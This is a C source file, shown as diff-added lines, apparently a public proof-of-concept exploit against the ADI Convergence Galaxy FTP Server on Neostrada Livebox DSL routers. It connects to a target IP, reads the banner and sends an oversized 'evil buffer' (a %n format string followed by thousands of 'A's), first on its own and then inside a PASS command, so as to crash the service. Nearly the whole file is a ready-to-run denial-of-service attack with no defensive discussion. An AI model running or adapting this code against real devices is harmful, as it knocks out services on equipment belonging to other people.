+struct sockaddr_in their_addr; 
+
+
+
+int konekt(char *addr) 
+{ 
+  int sock; 
+
+  he=gethostbyname(addr); 
+  if(he==NULL) 
+  { 
+    printf("Unknow host!\nexiting..."); 
+    return -1; 
+  } 
+  if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) 
+  { 
+    perror("socket"); 
+    return -2; 
+  } 
+
+  their_addr.sin_family = AF_INET;    
+  their_addr.sin_port = htons(port);  
+  their_addr.sin_addr = *((struct in_addr *)he->h_addr); 
+  memset(&(their_addr.sin_zero), '\0', 8); 
+  if (connect(sock, (struct sockaddr *)&their_addr, 
+      sizeof(struct sockaddr)) == -1) 
+  { 
+    perror("connect"); 
+    return -1; 
+  } 
+
+  return sock; 
+} 
+
+int main(int argc,char *argv[])
+{
+	
+printf("\n+===============================Yeah======================================+");
+	printf("\n+= ADI Convergence Galaxy FTP Server v1.0 (Neostrada 
+Livebox DSL Router) =+");
+	printf("\n+=               Remote Buffer Overflow DoS Exploit                      
+=+");
+	printf("\n+=                              bY                                       
+=+");
+	printf("\n+=        Maks M. [0in] From Dark-CodeRs Security & 
+Programming Group!   =+");
+        printf("\n+=                    0in(dot)email[at]gmail(dot)com                     
+=+");
+        printf("\n+=               Please visit: 
+http://dark-coders.4rh.eu                 =+");
+        printf("\n+=      Greetings to: Die_Angel, Sun8hclf, M4r1usz, 
+Aristo89, Djlinux    =+");
+	printf("\n+=                    MaLy, Slim, elwin013, 
+Rade0n3900, Wojto111,        =+");
+        printf("\n+=                    Chomzee, AfroPL, Joker186                          
+=+");
+	
+printf("\n+===============================Yeah======================================+");
+
+	if(argc<2)
+	{
+		printf("\nUse %s [IP]!\n",argv[0]);
+		exit(0);
+	}
+	printf("\nConnecting to:%s...",argv[1]);
+int sock=konekt(argv[1]);
+if(sock<0)
+{
+	printf("\neh...");
+	exit(0);
+}
+printf("\nConnected!!\n");
+char rcv[256];
+recv(sock,rcv,255,0);
+printf("\n%s\n",rcv);
+printf("\nSending evil buffer..");
+char evil[100*100]="%n\x01\x02\x03\x04";
+int i;
+for(i=0;i<(100*100)-100;i++)
+{
+	strcat(evil,"A");
+}
+
+strcat(evil,"\r\n");
+send(sock,evil,strlen(evil),0);
+strcpy(rcv,"");
+recv(sock,rcv,255,0);
+printf("\n%s\n",rcv);
+char pass[100*1000]="PASS ";
+strcat(pass,evil);
+strcat(pass,"\n\r");
+send(sock,pass,strlen(pass),0);
+strcpy(rcv,"");
+recv(sock,rcv,255,0);
+printf("\n%s\n",rcv);
+printf("\nOK!\nYou're Livebox FTP server should fu**ed out...");
+
+exit(0);
+}